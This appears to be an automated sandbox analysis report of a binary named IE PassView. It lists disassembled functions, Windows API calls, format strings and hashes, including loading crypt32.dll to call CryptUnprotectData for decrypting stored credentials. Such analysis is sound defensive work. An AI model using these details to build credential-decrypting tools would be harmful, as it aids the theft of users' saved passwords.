                                        • Instruction ID: 1a204863c46acf8627b431d74e017110a0c67be5a0ad28ab99641a1d26abf9c4
                                        • Opcode Fuzzy Hash: 75d2357909d40158cc69edc1db622911d699251443c9bce1769a0f969478b0a7
                                        • Instruction Fuzzy Hash: 8B11A972504318ABDB20A761DD49FDB77BC9B14700F0044BAB685F20D1EBB499D48F69
                                        Function 0040168F Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040169E
                                        • GetSystemMetrics.USER32(00000015), ref: 004016AC
                                        • GetSystemMetrics.USER32(00000014), ref: 004016B8
                                        • BeginPaint.USER32(?,?), ref: 004016D2
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E1
                                        • EndPaint.USER32(?,?), ref: 004016EE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: fcb7e482eb76ba8090ad36150f4fcea21044d1364904f0aff478c34c2a334ba8
                                        • Instruction ID: 51d58632dde0b2df19cce2622bda81a95d759c7467a932302152d961ccb82f95
                                        • Opcode Fuzzy Hash: fcb7e482eb76ba8090ad36150f4fcea21044d1364904f0aff478c34c2a334ba8
                                        • Instruction Fuzzy Hash: AC014B72910218EFDF04DFA9DD489FEBBBDFB49301F000929EA11BA194DB71A914CB90
                                        Function 0040AB23 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040AB3B
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        • sprintf.MSVCRT ref: 0040AB68
                                        • MessageBoxA.USER32(?,00000000,IE PassView,00000024), ref: 0040AB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModule$LoadMessageString_mbscpymemcpymemsetsprintfstrlen
                                        • String ID: %s%s$IE PassView
                                        • API String ID: 4065552295-2879795094
                                        • Opcode ID: 9df0477533ba83204a857130b0cef703b924667a782a429e98ea27dafaf9c7a3
                                        • Instruction ID: f6a349c11968531fa7dfc28a6d2e01e9891fc91bb9518483c4496ef7fa76d560
                                        • Opcode Fuzzy Hash: 9df0477533ba83204a857130b0cef703b924667a782a429e98ea27dafaf9c7a3
                                        • Instruction Fuzzy Hash: 8701A7B2A443047BD721A6759C47FAA73AC9B05708F10087AF709FA1C2E67CBA55462F
                                        Function 00407938 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407963
                                        • sprintf.MSVCRT ref: 00407978
                                          • Part of subcall function 00407A13: memset.MSVCRT ref: 00407A37
                                          • Part of subcall function 00407A13: GetPrivateProfileStringA.KERNEL32(004121F8,0000000A,0040E470,?,00001000,004120F0), ref: 00407A59
                                          • Part of subcall function 00407A13: _mbscpy.MSVCRT(?,?), ref: 00407A73
                                        • SetWindowTextA.USER32(?,?), ref: 0040799F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$PrivateProfileStringTextWindow_mbscpysprintf
                                        • String ID: caption$dialog_%d
                                        • API String ID: 336690586-4161923789
                                        • Opcode ID: ac7cc4696a89eb1cba6d083646845e466a8c7c1c47553c4c710892c2a750e08b
                                        • Instruction ID: e676f763466c337fa742e808a0462136ccf328752376158856b18cf97ff1e9ac
                                        • Opcode Fuzzy Hash: ac7cc4696a89eb1cba6d083646845e466a8c7c1c47553c4c710892c2a750e08b
                                        • Instruction Fuzzy Hash: DDF0BB709442497AEB12E7A5CD06FC93A6C6B08745F0040B2BB44F51D1D7F8A9E48B5F
                                        Function 004054EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessagesprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 1670431679-1552265934
                                        • Opcode ID: 841bd09bb5ef585932fac9cdc1f85acd03c61bd054173f3906aa32b2af69f6f6
                                        • Instruction ID: 77d8efe28dd78b6f0643021b09889a2d3b867daaa4c0b42a6eec78336504f6ab
                                        • Opcode Fuzzy Hash: 841bd09bb5ef585932fac9cdc1f85acd03c61bd054173f3906aa32b2af69f6f6
                                        • Instruction Fuzzy Hash: D5F0A7F64001186BDB20A656DC05F9676BCEB40344F140476FA05F21C0EA74DA158F59
                                        Function 0040329E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(crypt32.dll,004032F8,Microsoft_WinInet,004066B9,?,?,?,?,00000000), ref: 004032AC
                                        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 004032BE
                                        • FreeLibrary.KERNEL32(00000000), ref: 004032E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: CryptUnprotectData$crypt32.dll
                                        • API String ID: 145871493-1827663648
                                        • Opcode ID: bf59056d1eee5cbda9ce93750894b4eac22a5dcb94889e471285fb9aaac960fc
                                        • Instruction ID: c01f5e3405d155f9615ee7ba2b3405c7219808126caa219960ebcac386442010
                                        • Opcode Fuzzy Hash: bf59056d1eee5cbda9ce93750894b4eac22a5dcb94889e471285fb9aaac960fc
                                        • Instruction Fuzzy Hash: 94F09870640711CBEB249F66CA49753BAECAB00707F10CC7DE49AE66D0D7B9D550CB18
                                        Function 00403923 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 125stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040393E
                                        • _snprintf.MSVCRT ref: 004039A5
                                          • Part of subcall function 0040639C: strlen.MSVCRT ref: 004063C3
                                          • Part of subcall function 0040639C: strlen.MSVCRT ref: 004063D0
                                          • Part of subcall function 004063F9: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,00402B17,?,?,?,?), ref: 0040640F
                                          • Part of subcall function 004063F9: strlen.MSVCRT ref: 0040645D
                                          • Part of subcall function 004063F9: strlen.MSVCRT ref: 00406465
                                        • strlen.MSVCRT ref: 004039F2
                                        • strlen.MSVCRT ref: 004039FD
                                          • Part of subcall function 004056DE: strlen.MSVCRT ref: 004056E3
                                          • Part of subcall function 004056DE: memcpy.MSVCRT(?,?,00000000,?,00401F7D,?), ref: 004056F8
                                        Strings
                                        • %8.8X-%4.4X-%4.4X-%2.2X%2.2X-%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X, xrefs: 0040399D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$FileFindFirst_snprintfmemcpymemset
                                        • String ID: %8.8X-%4.4X-%4.4X-%2.2X%2.2X-%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X
                                        • API String ID: 3610737902-4003780816
                                        • Opcode ID: 5938a84a3a5096475608d5aad8b60bcbdd3638d88dcc76a6290295a6f1b42c4b
                                        • Instruction ID: 38ea13b14110fb611f5d2deffdce458bca4dc30c850e1321a484ceb1a5631d69
                                        • Opcode Fuzzy Hash: 5938a84a3a5096475608d5aad8b60bcbdd3638d88dcc76a6290295a6f1b42c4b
                                        • Instruction Fuzzy Hash: 9241A1B1A001599BCB04DAA9CC419FF77AC9B44315F40016AF846F71C1E678AA85CB69
                                        Function 00408211 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081B7
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081C5
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081D6
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081ED
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081F6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 0040822C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 0040823F
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 00408252
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 00408265
                                        • free.MSVCRT ref: 0040829E
                                          • Part of subcall function 004060D5: free.MSVCRT ref: 004060DC
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: d40dc89c096fa528deae5bf6a4c41c3a11779ecb420b88136e724b5d073612da
                                        • Instruction ID: 0033a09393801e04a52900815f5e32bdd2be366de1ac8b2c487ed1914441202d
                                        • Opcode Fuzzy Hash: d40dc89c096fa528deae5bf6a4c41c3a11779ecb420b88136e724b5d073612da
                                        • Instruction Fuzzy Hash: BF01E532E01D305BC626BB6AA90541FB394AF8672030682BFF886773C18F3C6C4246DD
                                        Function 00409175 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        • memset.MSVCRT ref: 004091AB
                                          • Part of subcall function 0040D0C2: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,004091CC,?,?), ref: 0040D130
                                          • Part of subcall function 00408C16: _mbscpy.MSVCRT(00000000,?,004091E1,?,?,?), ref: 00408C1B
                                          • Part of subcall function 00408C16: _strlwr.MSVCRT ref: 00408C5E
                                        • sprintf.MSVCRT ref: 004091F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 3337535707-2769808009
                                        • Opcode ID: 8e9a29ac9f4a23b6f82cdd24553fda3ede00e5e2678d7fcfdccf6d3a88681ffd
                                        • Instruction ID: 92280242408d335295641b7a7e4fe2c562f8bd416bcfcaf38d4b260d20b3f19f
                                        • Opcode Fuzzy Hash: 8e9a29ac9f4a23b6f82cdd24553fda3ede00e5e2678d7fcfdccf6d3a88681ffd
                                        • Instruction Fuzzy Hash: 5D11E33190061ABFDB11AF55CC42F997B64FF08328F10007AF808765E2C779B9A0DB98
                                        Function 00407827 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 00407839
                                        • GetWindowRect.USER32(?,?), ref: 00407846
                                        • GetClientRect.USER32(00000000,?), ref: 00407851
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00407861
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040787D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 8340e04b85906bd98d07a4f2b488c610fe3b5b94f9825e5ac61aef3b622d6b89
                                        • Instruction ID: 0af8d93023ce6edc03cfe1a7952551e03fdd8b742c1bc2359a0d55ce5666e187
                                        • Opcode Fuzzy Hash: 8340e04b85906bd98d07a4f2b488c610fe3b5b94f9825e5ac61aef3b622d6b89
                                        • Instruction Fuzzy Hash: CA012D32801129ABDB11ABA69D4DEFFBFBCEF06754F044529F915B2140D7389501CBA5
                                        Function 00409470 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00409493
                                        • memset.MSVCRT ref: 004094A9
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                          • Part of subcall function 00408C16: _mbscpy.MSVCRT(00000000,?,004091E1,?,?,?), ref: 00408C1B
                                          • Part of subcall function 00408C16: _strlwr.MSVCRT ref: 00408C5E
                                        • sprintf.MSVCRT ref: 004094E0
                                        Strings
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004094AE
                                        • <%s>, xrefs: 004094DA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 3699762281-1998499579
                                        • Opcode ID: 6e654cf32214f9afde9f8d02956914338a5825c5c9d3e120d1f05758333a65fd
                                        • Instruction ID: f6ae4f78776c0d50e5f732e7396b25190cc3ca3b33437b2577dc2bf549dc7d25
                                        • Opcode Fuzzy Hash: 6e654cf32214f9afde9f8d02956914338a5825c5c9d3e120d1f05758333a65fd
                                        • Instruction Fuzzy Hash: 2B01A7B290011967DB20A655CC46FDB7A7CDF54315F0400BAB509F31C2DB789A948BB5
                                        Function 004081AB Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081B7
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081C5
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081D6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081ED
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081F6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: e6acfa7396b52a114121f7a4b8c1391fec31caade5ddf845c65d966cde2c90b6
                                        • Instruction ID: 30514a08b015e64f468dc56151b9c8415313b9cb726f4dfed3d47dcf498ace6e
                                        • Opcode Fuzzy Hash: e6acfa7396b52a114121f7a4b8c1391fec31caade5ddf845c65d966cde2c90b6
                                        • Instruction Fuzzy Hash: CDF04FB2A047014BD7209FAE99C085BB3D9BF0A314760883FF0C9E7691CB38F8854A1C
                                        Function 00404D4B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • BeginDeferWindowPos.USER32(00000004), ref: 00404D5F
                                          • Part of subcall function 004015EF: GetDlgItem.USER32(?,?), ref: 004015FF
                                          • Part of subcall function 004015EF: GetClientRect.USER32(?,?), ref: 00401611
                                          • Part of subcall function 004015EF: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167B
                                        • EndDeferWindowPos.USER32(00000000), ref: 00404DAD
                                        • InvalidateRect.USER32(?,?,00000001), ref: 00404DB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                        • String ID: $
                                        • API String ID: 2498372239-3993045852
                                        • Opcode ID: 715fc5b0b7331e490694d994f071c2009a6bcabda0f169ec3166fcfd20ad611d
                                        • Instruction ID: 0d0d544e0b6c92358beb98dd67f43578e8bfaef22e056f663664e6f497536415
                                        • Opcode Fuzzy Hash: 715fc5b0b7331e490694d994f071c2009a6bcabda0f169ec3166fcfd20ad611d
                                        • Instruction Fuzzy Hash: 15119BB0640218BFE7156F55CCC5F6F766CDF91B99F10403BF6057A1E0C6749E0186A9
                                        Function 00407A13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407A37
                                        • GetPrivateProfileStringA.KERNEL32(004121F8,0000000A,0040E470,?,00001000,004120F0), ref: 00407A59
                                        • _mbscpy.MSVCRT(?,?), ref: 00407A73
                                        Strings
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00407A20
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString_mbscpymemset
                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                        • API String ID: 408644273-3424043681
                                        • Opcode ID: 50f65c9c75391e1ee23d2ad7ec9f945dc9bd406b076fe35e90e64b3f3f723888
                                        • Instruction ID: d2185ea61b782a82967e3816b37e7080ad77801d9a3ce128af9e194d45c68cec
                                        • Opcode Fuzzy Hash: 50f65c9c75391e1ee23d2ad7ec9f945dc9bd406b076fe35e90e64b3f3f723888
                                        • Instruction Fuzzy Hash: E1F0E9729041A87BDB239794DC01FCA779C9B08305F1040B6B789F10C0D6F8AEC48BAD
                                        Function 00401085 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040579F: memset.MSVCRT ref: 004057A9
                                          • Part of subcall function 0040579F: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,0040109D,MS Sans Serif,0000000A,00000001), ref: 004057E9
                                        • CreateFontIndirectA.GDI32(?), ref: 004010A4
